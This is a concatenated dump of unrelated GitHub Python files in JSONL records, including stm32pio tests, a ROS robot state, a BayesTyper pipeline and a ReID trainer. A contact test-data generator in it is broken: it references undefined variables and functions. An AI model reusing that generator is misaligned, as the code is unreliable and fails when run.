'root_folder/nested_folder/file_in_nested_folder_1.jpg'\n            ]\n            ignore_list_unfolded = reduce(\n                lambda array, entry:\n                    array +  # accumulator\n                    [Path(entry)] +  # include the entry itself because it isn't among parents\n                    [parent for parent in Path(entry).parents if parent != Path()],  # remove the '.' path\n                ignore_list, [])\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            project.config.set('project', 'cleanup_ignore', '\\n'.join(ignore_list))\n            project.clean()\n            for endpoint in [STAGE_PATH / entry for entry in test_tree_endpoints]:\n                if endpoint.relative_to(STAGE_PATH) in ignore_list_unfolded:\n                    self.assertTrue(endpoint.exists(), msg=\"Files/folders from the ignore list should be preserved\")\n                else:\n                    self.assertFalse(endpoint.exists(), msg=\"Unnecessary files/folders haven't been removed\")\n\n        self.setUp()\n        subprocess.run(['git', 'init'], cwd=str(STAGE_PATH), check=True)  # TODO: str() - 3.6 compatibility\n        plant_fs_tree(STAGE_PATH, test_tree)\n        STAGE_PATH.joinpath('.gitignore').write_text(inspect.cleandoc('''\n            # sample .gitignore\n            *.mp3\n        '''))\n        with self.subTest(msg=\"use .gitignore\"):\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            # This is important, otherwise git won't clean anything\n            subprocess.run(['git', 'add', '--all'], cwd=str(STAGE_PATH), check=True)  # TODO: str() - 3.6 compatibility\n            project.config.set('project', 'cleanup_use_git', 'yes')\n            project.clean()\n            for endpoint in [STAGE_PATH / entry for entry in test_tree_endpoints]:\n                if endpoint.relative_to(STAGE_PATH) == Path('root_folder').joinpath('nested_file.mp3'):\n                    self.assertFalse(endpoint.exists(), msg=\"Files/folders from the .gitignore should be removed\")\n                else:\n                    self.assertTrue(endpoint.exists(), msg=\"Files/folders tracked by git should be preserved\")\n\n        # Nasty hack for Windows, otherwise it may not delete all the temp files\n        # (https://github.com/ussserrr/stm32pio/issues/23)\n        if platform.system() == 'Windows':\n            subprocess.run(f'rd /s /q \"{STAGE_PATH}\"', shell=True, check=True)\n\n        self.setUp()\n        plant_fs_tree(STAGE_PATH, test_tree)\n        with self.subTest(msg=\"save current content in ignore list\"):\n            project = stm32pio.core.project.Stm32pio(STAGE_PATH)\n            project.config.set_content_as_ignore_list()\n            STAGE_PATH.joinpath('this_file_should_be_removed').touch()\n            project.clean()\n            self.assertTrue(tree_exists_fully(STAGE_PATH, test_tree), msg=\"Test tree should be preserved\")\n            self.assertFalse(STAGE_PATH.joinpath('this_file_should_be_removed').exists(),\n                             msg=\"File added later should be 
removed\")\n","repo_name":"ussserrr/stm32pio","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":23096,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"40"} +{"seq_id":"43255141743","text":"from technical_analysis._utils.convert_datatype import convert_to_numpy, convert_numpy\nimport technical_analysis as ta\nimport numpy as np\n\ndef ADX(high, low, close, limit=14):\n # validate data\n high, original_datatype = convert_to_numpy(high)\n low, _ = convert_to_numpy(low)\n close, _ = convert_to_numpy(close)\n \n np.seterr(divide='ignore', invalid='ignore')\n\n # find di\n plus_di = ta.PLUS_DI(high, low, close, limit)\n minus_di = ta.MINUS_DI(high, low, close, limit)\n\n # calculate dx\n dx = abs(plus_di - minus_di)/abs(plus_di + minus_di)\n\n # get average directional movement index using \n adx = 100*ta.RMA(dx, limit)\n\n return convert_numpy(adx, original_datatype)","repo_name":"h3x4d1v1n3/technical_analysis","sub_path":"technical_analysis/trend/_average_directional_movement_index.py","file_name":"_average_directional_movement_index.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"15727470590","text":"def paginate(result_list, pageNum, pageSize):\n page_num = 1\n page_size = len(result_list)\n\n page_num = int(pageNum) if pageNum else page_num\n\n page_size = int(pageSize) if pageSize else page_size\n\n start = (page_num - 1) * page_size\n end = start + page_size\n return result_list[slice(start, end)]\n","repo_name":"Nguyen-Quy/quasar-todo","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37468061355","text":"#!/usr/bin/env python\nimport rospy\nfrom flexbe_core import EventState, Logger\nfrom flexbe_core.proxy import ProxyPublisher, ProxySubscriberCached\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\nclass GoForwardState_input(EventState):\n\n def __init__(self, speed, travel_dist, obstacle_dist):\n super(GoForwardState_input, self).__init__(outcomes=['failed', 'done'],\n input_keys=['remaining_travel_dist_IN'],\n output_keys=['remaining_travel_dist_OUT'])\n self._start_time = None\n self.distance_traveled = 0.0\n self.data = None\n self._speed = speed\n self._travel_dist = travel_dist\n self._obstacle_dist = obstacle_dist\n\n self.vel_topic = 'diff_velocity_controller/cmd_vel'\n self.scan_topic = '/scan'\n\n #create publisher passing it the vel_topic_name and msg_type\n self.pub = ProxyPublisher({self.vel_topic: Twist})\n #create subsciber\n self.scan_sub = ProxySubscriberCached({self.scan_topic: LaserScan})\n #self.scan_sub.set_callback(self.scan_topic, self.scan_callback)\n\n def execute(self, userdata):\n if not self.cmd_pub:\n return 'failed'\n #run obstacle checks [index 0: Left, 360: middle, 719:right]\n if(self.scan_sub.has_msg(self.scan_topic)):\n self.data = self.scan_sub.get_last_msg(self.scan_topic)\n self.scan_sub.remove_last_msg(self.scan_topic)\n Logger.loginfo('FWD obstacle distance is: %s' % self.data.ranges[360])\n if self.data.ranges[360] <= self._obstacle_dist:\n self.data = None\n userdata.remaining_travel_dist_OUT = self._travel_dist - self.distance_traveled\n return 'failed'\n\n #measure distance traveled\n elapsed_time = (rospy.Time.now() - self._start_time).to_sec()\n 
self.distance_traveled = elapsed_time * self._speed\n\n        if self.distance_traveled >= self._travel_dist:\n            return 'done'\n\n        #drive\n        self.pub.publish(self.vel_topic, self.cmd_pub)\n\n    def on_enter(self, userdata):\n        Logger.loginfo('Drive FWD STARTED!')\n        self._start_time = rospy.Time.now()\n        #set robot speed here\n        self.cmd_pub = Twist()\n        self.cmd_pub.linear.x = self._speed\n        self.cmd_pub.angular.z = 0.0\n\n        if userdata.remaining_travel_dist_IN:\n            self._travel_dist = userdata.remaining_travel_dist_IN\n            Logger.loginfo(\"Remaining Distance to Travel %s\" % self._travel_dist)\n\n    def on_exit(self, userdata):\n        self.cmd_pub.linear.x = 0.0\n        self.pub.publish(self.vel_topic, self.cmd_pub)\n        Logger.loginfo('Drive FWD ENDED!')\n\n    def on_start(self):\n        Logger.loginfo('Drive FWD READY!')\n\n    def on_stop(self):\n        Logger.loginfo('Drive FWD STOPPED!')\n\n    def scan_callback(self, data):\n        self.data = data\n\n\n\n\n","repo_name":"guidosassaroli/mobile_manipulator","sub_path":"extra_packages/flexbe/lynxbot_behaviors/lynxbot_flexbe_states/src/lynxbot_flexbe_states/drive_forward_input.py","file_name":"drive_forward_input.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}\n{"seq_id":"37686150411","text":"'''\nA dictionary containing simple parameters of current and future CMB experiments. \n'''\nbolometers = {'Planck': {'fsky': 1.0, 'thetab': 7.0, 'DeltaT': 30.0, 'iterative': False},\\\n              'AdvACT': {'fsky': 0.2, 'thetab': 1.5, 'DeltaT': 12.0, 'iterative': False},\\\n              'SO': {'fsky': 0.4, 'thetab': 1.4, 'DeltaT': 7.0, 'iterative': False},\\\n              'CMBS4': {'fsky': 0.4, 'thetab': 1.4, 'DeltaT': 1.0, 'iterative': True},\\\n              # 'CORE': {'fsky': 0.8, 'thetab': 2.0, 'DeltaT': 2.0, 'iterative': False},\\\n              # \n              # Schmittfull & Seljak (2017); https://arxiv.org/pdf/1710.09465.pdf\n              # 'SS17': {'fsky': 0.5, 'thetab': 1.0, 'DeltaT': 1.0, 'iterative': True}\n             }\n\n\nif __name__ == '__main__':\n    print('\\n\\nWelcome to bolometers.\\n\\n')\n\n    dict = bolometers['SO']\n\n    print('\\n\\nDone.\\n\\n')\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"cmb/bolometers.py","file_name":"bolometers.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}\n{"seq_id":"20522293369","text":"from model.contact import Contact\nimport random\nimport string\nimport os.path\nimport jsonpickle\nimport getopt\nimport sys\n\n\ntry:\n    opts, args = getopt.getopt(sys.argv[1:], \"n:f:\", [\"number of contact\", \"file\"])\nexcept getopt.GetoptError as err:\n    # the getopt module has no usage() helper; report the error instead\n    print(err)\n    sys.exit(2)\n\nn = 3\nf = \"data/contacts.json\"\n\nfor o, a in opts:\n    if o == \"-n\":\n        n = int(a)\n    elif o == \"-f\":\n        f = a\n\n\ndef random_string(maxlen):\n    symbols = string.ascii_letters + string.digits + \" \"*10\n    return 
\"\".join([random.choice(e) for i in range(random.randrange(maxlen))]) + \"@\".join([random.choice(mail) for i in range(random.randrange(maxlen))])\n\n\ndef random_site(maxlen):\n site = string.ascii_letters + string.digits\n return \"www\" + \"\".join([random.choice(site) for i in range(random.randrange(maxlen))])\n\n\ntestdata = [Contact(firstname=random_string(6),\n middlename=random_string(4),\n lastname=random_string(9),\n nickname=random_string(8),\n title=random_string(20),\n company=random_string(8),\n address=random_string(30),\n home=random_number(9),\n mobile=random_number(9),\n work=random_number(9),\n fax=random_number(9),\n email=random_email(6),\n email2=random_email(5),\n email3=random_email(4),\n homepage=random_site(10),\n bday=random_day(),\n bmonth=random_month(),\n byear=random_number(4),\n address2=random_string(35),\n phone2=random_number(10),\n notes=random_string(15)) for i in range(n)]\n\n\nfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", f)\n\nwith open(file, \"w\") as out:\n jsonpickle.set_encoder_options(\"json\", indent=2)\n out.write(jsonpickle.encode(testdata))","repo_name":"AlreyQuin/python_training","sub_path":"generator/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30188082008","text":"import time\r\nfrom threading import Timer\r\n\r\n\r\ndef display(msg):\r\n print(msg + ' ' + time.strftime('%H:%M:%S'))\r\n\r\n\r\nclass RepeatTimer(Timer):\r\n def run(self):\r\n while not self.finished.wait(self.interval):\r\n self.function(*self.args, **self.kwargs)\r\n print(' ')\r\n\r\n\r\n# We are now creating a thread timer and controling it\r\ntimer = RepeatTimer(1, display, [''])\r\ntimer.start() # recalling run\r\nprint('Threading started')\r\ntime.sleep(10) # It gets suspended for the given number of seconds\r\ntimer.cancel()\r\nprint('Threading finishing')\r\n","repo_name":"Mathiiss/demieur","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30453781533","text":"def nones_a_0(valor):\n if valor == None:\n return 0\n else:\n return valor\n\ndef nota_teoria(media1, media2):\n nota1 = nones_a_0(media1)\n nota2 = nones_a_0(media2)\n return (nota1 + nota2) / 2\n\ndef nota_cuatrimestre(notas_teoricas, nota_practico):\n practico = nones_a_0(nota_practico)\n media_teoricos = nota_teoria(notas_teoricas[0], notas_teoricas[1])\n if media_teoricos > 4:\n nota_final = 0.2 * media_teoricos + 0.8 * practico\n else:\n nota_final = 0\n return nota_final\n\ndef nota_continua(notas_teoricas, notas_practicas):\n nota_primer_cuatrimestre = nota_cuatrimestre(notas_teoricas[0:2], notas_practicas[0])\n nota_segundo_cuatrimestre = nota_cuatrimestre(notas_teoricas[2:4], notas_practicas[1])\n nota_final = (nota_primer_cuatrimestre + nota_segundo_cuatrimestre) / 2\n if nota_primer_cuatrimestre < 4 or nota_segundo_cuatrimestre < 4:\n nota_final = min(4, nota_final)\n return nota_final\n","repo_name":"micrusa/practicas-fp-python","sub_path":"lab-1_calificaciones/src/calificaciones.py","file_name":"calificaciones.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7715771048","text":"#!/usr/bin/env python3\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport run_cmd\r\nfrom 
getsize import getsize\r\n\r\n\r\n# genotype\r\ndef main(\r\n reference_file: str,\r\n vcf_file: str,\r\n bam2bayestyper_file: str,\r\n bam_infos_map, \r\n env_path, \r\n threads: int,\r\n restart: bool\r\n):\r\n \"\"\"\r\n :param reference_file: reference genome\r\n :param vcf_file: vcf file\r\n :param bam2bayestyper_file: configure fule\r\n :param bam_infos_map: information of BAM\r\n :param env_path: env path\r\n :param threads: thread\r\n :param restart: Whether to check if the file exists and skip this step\r\n :return:\r\n \"\"\"\r\n\r\n # log\r\n stdout = \"\"\r\n stderr = \"\"\r\n log_out = \"\"\r\n\r\n # First traverse the bam file and soft-link it to the current working path\r\n for key, value in bam_infos_map.items():\r\n bam_file = value[\"bam_file\"]\r\n # ln\r\n cmd = \"ln -sf {} .\".format(bam_file)\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.ln\", env_path)\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # Traversing bam file hashes\r\n work_dir = os.getcwd()\r\n try:\r\n with open(bam2bayestyper_file, \"r\") as f:\r\n for information in f.readlines():\r\n informations_split = information.strip().split()\r\n prefix = informations_split[0]\r\n prefix = prefix + \".bam\" # Makefile prefix\r\n bam_file = informations_split[2]\r\n\r\n # kmc\r\n cmd = \"kmc -k55 -ci1 -t1 -fbam {} {} {}\".format(bam_file, prefix, work_dir)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(prefix + \".kmc_pre\") <= 0 or getsize(prefix + \".kmc_suf\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.kmc\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.kmc\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # bayesTyperTools makeBloom\r\n cmd = \"bayesTyperTools makeBloom -k {} -p {}\".format(prefix, threads)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(prefix + \".bloomData\") <= 0 or getsize(prefix + \".bloomMeta\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.makeBloom\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.makeBloom\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n except FileNotFoundError:\r\n log_out = \"[EVG.{}] FileNotFoundError: [Errno 2] No such file or directory: '{}'.\\n\".format(\r\n \"BayesTyper\",\r\n bam2bayestyper_file\r\n )\r\n return \"\", \"\", log_out, \"\"\r\n\r\n # bayesTyper cluster\r\n cmd = \"bayesTyper cluster -v {} -s {} -g {} -p {}\".format(\r\n vcf_file,\r\n bam2bayestyper_file,\r\n reference_file,\r\n threads\r\n )\r\n\r\n # Check if the file exists\r\n if restart:\r\n # <= 0\r\n if getsize(\"bayestyper_cluster_data/intercluster_regions.txt.gz\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/multigroup_kmers.bloomData\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/multigroup_kmers.bloomMeta\") <= 0 or \\\r\n getsize(\"bayestyper_cluster_data/parameter_kmers.fa.gz\") <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.cluster\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit 
task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.cluster\", env_path)\r\n\r\n # Report an error if there is a problem with the exit code\r\n if log_out:\r\n return stdout, stderr, log_out, \"\"\r\n\r\n # bayesTyper genotype\r\n cmd = \"bayesTyper genotype -v bayestyper_unit_1/variant_clusters.bin -c bayestyper_\" \\\r\n \"cluster_data -s {} -g {} -o bayestyper_unit_1/bayestyper -z -p {} --noise-genotyping\".\\\r\n format(bam2bayestyper_file, reference_file, threads)\r\n\r\n # Check if the file exists\r\n if restart:\r\n # check file\r\n file_size = getsize(\r\n \"bayestyper_unit_1/bayestyper.vcf.gz\"\r\n )\r\n # <= 0\r\n if file_size <= 0:\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.genotype\", env_path)\r\n else: # If restart is not specified, run directly\r\n # submit task\r\n stdout, stderr, log_out = run_cmd.run(cmd, \"BayesTyper.genotype\", env_path)\r\n\r\n vcf_out_file = os.path.join(os.getcwd(), \"bayestyper_unit_1/bayestyper.vcf.gz\")\r\n\r\n return stdout, stderr, log_out, vcf_out_file\r\n","repo_name":"JiaoLab2021/EVG","sub_path":"src/BayesTyper.py","file_name":"BayesTyper.py","file_ext":"py","file_size_in_byte":5464,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"9052461485","text":"from crypt import methods\nimport string\nimport youtube_dl\nfrom requests import request\nfrom App import app\nfrom flask import render_template\nimport torch\nimport youtube_dl\nimport flask\nfrom App import utils\nimport cv2 as cv\nfrom pathlib import Path \nimport sys \nfrom utils.general import LOGGER, check_file, check_img_size, check_imshow, check_requirements\nimport requests\n\nsys.path.append('..')\n\n\n\n@app.route('/', methods=['get', 'post'])\ndef accueil():\n \n return render_template(\"predict.html\")\n\n\n\n@app.route('/predict', methods=['get', 'post'])\ndef prediction():\n # model = torch.hub.load('ultralytics/yolov5', 'yolov5m6')\n url = flask.request.form['url']\n data ={'url':url}\n x = requests.post('http://127.0.0.1:5000/predict', json=url, headers={'Content-Type': 'application/json'})\n # utils.dl_yt(str(url))\n return \"ok\"\n\n@app.route('/testprediction')\ndef test():\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='weights/best.pt', force_reload=True)\n stride, names, pt = model.stride, model.names, model.pt\n imgsz = check_img_size((640, 640), s=stride) \n cam=cv.VideoCapture('Bah ils sont où tes potes -oCVRRHl4NM8.f299.mp4')\n number_of_frame = cam.get(cv.CAP_PROP_FRAME_COUNT)\n print(number_of_frame)\n fps=cam.get(cv.CAP_PROP_FPS)\n print('fps: ', fps)\n n=0\n i=0\n while True:\n ret, frame = cam.read()\n print('first step')\n if (2*n)%fps==0:\n pred = model(frame)\n print('predict in progress')\n i+=1\n n+=1\n if not ret:\n print(i)\n print(n)\n break\n cam.release()\n cv.destroyAllWindows()\n return \"okok\"","repo_name":"theotrc/Brandseeker_website","sub_path":"App/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12135233766","text":"# -*- coding: utf-8 -*-\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, Qt\r\nfrom ui.frmAboutUi import *\r\nfrom AxRobotData import *\r\n\r\nclass frmAbout(QWidget,Ui_FormAbout):\r\n\r\n def __init__(self, MotionCtrl):\r\n super(frmAbout, self).__init__()\r\n # Init UI components\r\n self.setupUi(self)\r\n\r\n # Init normal data\r\n 
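# Keep references to the shared motion controller and its data model\r\n        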
self.MotionCtrl = MotionCtrl\r\n self.MotionData = MotionCtrl.MotionData\r\n\r\n self.setWindowFlags(QtCore.Qt.WindowCloseButtonHint)\r\n self.setWindowModality(2)\r\n\r\n # Load icon\r\n if os.path.isfile(dctAPP_CFIG[\"ABOUT_ICON\"]) == True:\r\n self.setWindowIcon(QtGui.QIcon(dctAPP_CFIG[\"ABOUT_ICON\"]))\r\n\r\n # Build up information\r\n self.lbAboutTitle.setText(\"AxRobot Motion Control Utility\")\r\n strInfo = \"\"\r\n strInfo += \"Version: {}\\r\\n\".format(dctAPP_CFIG[\"APP_VER\"])\r\n strInfo += \"VCP Identification {}\\r\\n\".format(dctAPP_CFIG[\"USB_CDC_IDENTIFY\"])\r\n strInfo += \"OS: Windows7/10 x64\\r\\n\"\r\n self.lbInfo.setText(strInfo)\r\n\r\n # Build up hyper link\r\n self.lbHyperLink_1.setText(\"{}: <A href='{}'>{}</a>\" \\\r\n .format(dctAPP_CFIG[\"LINK_TITLE_1\"], dctAPP_CFIG[\"HYPER_LINK_1\"], dctAPP_CFIG[\"HYPER_LINK_1\"]))\r\n self.lbHyperLink_1.setOpenExternalLinks(True)\r\n\r\n # Connect signal&slot paire\r\n self.btnCloseAbout.clicked.connect(self.click)\r\n\r\n def click(self):\r\n self.close()\r\n\r\n#End of Class frmAbout\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MyRobot-lab/AxRobotUtility","sub_path":"frmAbout.py","file_name":"frmAbout.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70125618042","text":"def check_anagram(a, b):\n if a is None or b is None or len(a) != len(b):\n return \"No es anagrama\"\n \n contador_a = {}\n contador_b = {}\n \n for i in a:\n if i not in contador_a.keys():\n contador_a[i] = 1\n else:\n contador_a[i] += 1\n \n for i in b:\n if i not in contador_b.keys():\n contador_b[i] = 1\n else:\n contador_b[i] += 1\n print(contador_a)\n print(contador_b)\n return \"Es anagrama\" if contador_a == contador_b else \"No es anagrama\"\n\nprint(check_anagram(\"mora\", \"roma\"))\n#{'m': 1, 'o': 1, 'r': 1, 'a': 1}\n#{'r': 1, 'o': 1, 'm': 1, 'a': 1}","repo_name":"HerbertM21/PyLogic","sub_path":"05. 
Algoritmos avanzados/Anagrama.py","file_name":"Anagrama.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44069722251","text":"#\n# @lc app=leetcode id=34 lang=python3\n#\n# [34] Find First and Last Position of Element in Sorted Array\n#\n\n# @lc code=start\nimport bisect\nfrom typing import List\n\n\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n if not nums:\n return [-1, -1]\n \n # l_index = bisect.bisect_left(nums, target)\n # r_index = bisect.bisect_right(nums, target)\n \n less = -1\n eq_or_greater = len(nums)\n while eq_or_greater - less > 1:\n mid = (less+eq_or_greater)//2\n if nums[mid] < target:\n less = mid\n else:\n eq_or_greater = mid\n l_index = eq_or_greater \n \n less_or_eq = -1\n greater = len(nums)\n while greater - less_or_eq > 1:\n mid = (less_or_eq+greater)//2\n if nums[mid] <= target:\n less_or_eq = mid\n else:\n greater = mid\n r_index = greater \n \n \n if l_index < len(nums) and nums[l_index] == target:\n return l_index, r_index-1\n else:\n return -1, -1\n \n \n \n# @lc code=end\n","repo_name":"yoshikipom/leetcode","sub_path":"solve/34.find-first-and-last-position-of-element-in-sorted-array.py","file_name":"34.find-first-and-last-position-of-element-in-sorted-array.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38812020408","text":"import datetime\r\nimport os\r\nimport sys\r\nimport time\r\nimport torch\r\nimport os.path as osp\r\nfrom torch.backends import cudnn\r\nfrom data.data_loader_build import build_data_loader\r\nfrom losses.loss_build import build_loss\r\nfrom model.model_build import build_model\r\nfrom utils.infer import inference\r\nfrom utils.logger import Logger\r\nfrom utils.lr_scheduler import WarmupMultiStepLR\r\nfrom utils.optimizer_build import build_optimizer\r\nfrom utils.trainer import do_train\r\n\r\nevaluate = False\r\nsave_dir = \"./\"\r\nresume = \"\"\r\n\r\n\r\ndef set_seed(seed):\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n # torch.cuda.manual_seed_all(seed)\r\n # np.random.seed(seed)\r\n # random.seed(seed)\r\n # torch.backends.cudnn.deterministic = True\r\n # torch.backends.cudnn.benchmark = True\r\n cudnn.benchmark = True\r\n\r\n\r\ndef main(args=None):\r\n if torch.cuda.is_available():\r\n print(\"cuda is available\")\r\n else:\r\n print(\"cuda is not available\")\r\n\r\n if not evaluate:\r\n sys.stdout = Logger(osp.join(save_dir, 'log_train_test.txt'))\r\n else:\r\n sys.stdout = Logger(osp.join(save_dir, 'log_test.txt'))\r\n\r\n print(\"Currently using GPU {}\".format(\"0\"))\r\n os.environ['CUDA_VISIBLE_DEVICES'] = \"0,1,2,3\"\r\n set_seed(3)\r\n if args is not None:\r\n data = args[\"dataset\"]\r\n else:\r\n data = 'm'\r\n train_loader, query_loader, gallery_loader, num_query, num_classes, test_loader, dataset_name = build_data_loader(\r\n data)\r\n\r\n print(\"Initializing model: {}\".format(\"MFEN\"))\r\n model = build_model(num_classes, data)\r\n print(\"Model size: {:.5f}M\".format(sum(p.numel() for p in model.parameters()) / 1000000.0))\r\n\r\n loss_func, center_criterion = build_loss(num_classes)\r\n optimizer, optimizer_center = build_optimizer(model, center_criterion)\r\n scheduler = WarmupMultiStepLR(optimizer, [40, 70], 0.1, 0.01, 10)\r\n\r\n start_epoch = 1\r\n max_epoch = 140\r\n\r\n if resume:\r\n print(\"Loading checkpoint from 
'{}'\".format(resume))\r\n checkpoint = torch.load(resume)\r\n model.load_state_dict(checkpoint['state_dict'])\r\n start_epoch = checkpoint['epoch'] + 1\r\n\r\n if evaluate:\r\n print(\"Evaluate only\")\r\n inference(model, query_loader, gallery_loader, dataset_name)\r\n return 0\r\n\r\n start = time.time()\r\n train_time = 0\r\n\r\n print(\"==> Start training\")\r\n for epoch in range(start_epoch, max_epoch + 1):\r\n start_time = time.time()\r\n\r\n do_train(\r\n epoch,\r\n model,\r\n center_criterion,\r\n train_loader,\r\n optimizer,\r\n optimizer_center,\r\n loss_func,\r\n )\r\n scheduler.step()\r\n time_epoch = round(time.time() - start_time)\r\n print(\"Epoch {} done. Time of epoch: {:.3f}[s]\"\r\n .format(epoch, time_epoch))\r\n train_time += time_epoch\r\n state = {'state_dict': model.state_dict(), 'epoch': epoch}\r\n if epoch % 20 == 0:\r\n torch.save(state, os.path.join(save_dir, \"MFEN\" + '_{}.pth'.format(epoch)))\r\n if epoch == max_epoch:\r\n # if epoch % 20 == 0:\r\n print(\"==> Test\")\r\n inference(model, query_loader, gallery_loader, dataset_name)\r\n\r\n elapsed = round(time.time() - start)\r\n elapsed = str(datetime.timedelta(seconds=elapsed))\r\n train_time = str(datetime.timedelta(seconds=train_time))\r\n print(\"Finished. Total elapsed time (h:m:s): {}. Training time (h:m:s): {}.\".format(elapsed, train_time))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jasonding111/Multi-level-feature-extraction-network-for-person-re-identification","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70151369400","text":"r\"\"\"\nRandom testing\n\nSome Sage modules do random testing in their doctests; that is, they\nconstruct test cases using a random number generator. To get the\nbroadest possible test coverage, we want everybody who runs the\ndoctests to use a different random seed; but we also want to be able\nto reproduce the problems when debugging. This module provides a\ndecorator to help write random testers that meet these goals.\n\"\"\"\n\nfrom functools import wraps\n\n\ndef random_testing(fn):\n r\"\"\"\n This decorator helps create random testers. These can be run as\n part of the standard Sage test suite; everybody who runs the test\n will use a different random number seed, so many different random\n tests will eventually be run.\n\n INPUT:\n\n - ``fn`` - The function that we are wrapping for random testing.\n\n The resulting function will take two additional arguments, *seed*\n (default ``None``) and *print_seed* (default ``False``). The\n result will set the random number seed to the given seed value (or\n to a truly random value, if *seed* is not specified), then call\n the original function. If *print_seed* is true, then the seed will\n be printed before calling the original function. If the original\n function raises an exception, then the random seed that was used\n will be displayed, along with a message entreating the user to\n submit a bug report. All other arguments will be passed through\n to the original function.\n\n Here is a set of recommendations for using this wrapper.\n\n The function to be tested should take arguments specifying the\n difficulty of the test (size of the test cases, number of\n iterations, etc.), as well as an argument *verbose* (defaulting to\n false). With *verbose* true, it should print the values being\n tested. 
Suppose ``test_foo()`` takes an argument for number of\n iterations. Then the doctests could be::\n\n test_foo(2, verbose=True, seed=0)\n test_foo(10)\n test_foo(100) # long time\n\n The first doctest, with the specified seed and ``verbose=True``, simply\n verifies that the tests really are reproducible (that ``test_foo``\n is correctly using the :mod:`randstate` framework). The next two tests\n use truly random seeds, and will print out the seed used if the test\n fails (raises an exception).\n\n If you want a very long-running test using this setup, you should do\n something like (in Python 2)::\n\n for _ in xrange(10^10): test_foo(100)\n\n instead of::\n\n test_foo(10^12)\n\n If the test fails after several hours, the latter snippet would\n make you rerun the test for several hours while reproducing and\n debugging the problem. With the former snippet, you only need to\n rerun ``test_foo(100)`` with a known-failing random seed.\n\n See :func:`sage.misc.random_testing.test_add_commutes` for a\n simple example using this decorator, and :mod:`sage.rings.tests`\n for realistic uses.\n\n Setting *print_seed* to true is useless in doctests, because the\n random seed printed will never match the expected doctest result\n (and using ``# random`` means the doctest framework will never\n report an error even if one happens). However, it is useful if\n you have a random test that sometimes segfaults. The normal\n print-the-random-seed-on-exceptions won't work then, so you can\n run::\n\n while True: test_foo(print_seed=True)\n\n and look at the last seed that was printed before it crashed.\n\n\n TESTS::\n\n sage: from sage.misc.random_testing import random_testing\n sage: def foo(verbose=False):\n ....: 'oh look, a docstring'\n ....: n = ZZ.random_element(2^50)\n ....: if verbose:\n ....: print(\"Random value: %s\" % n)\n 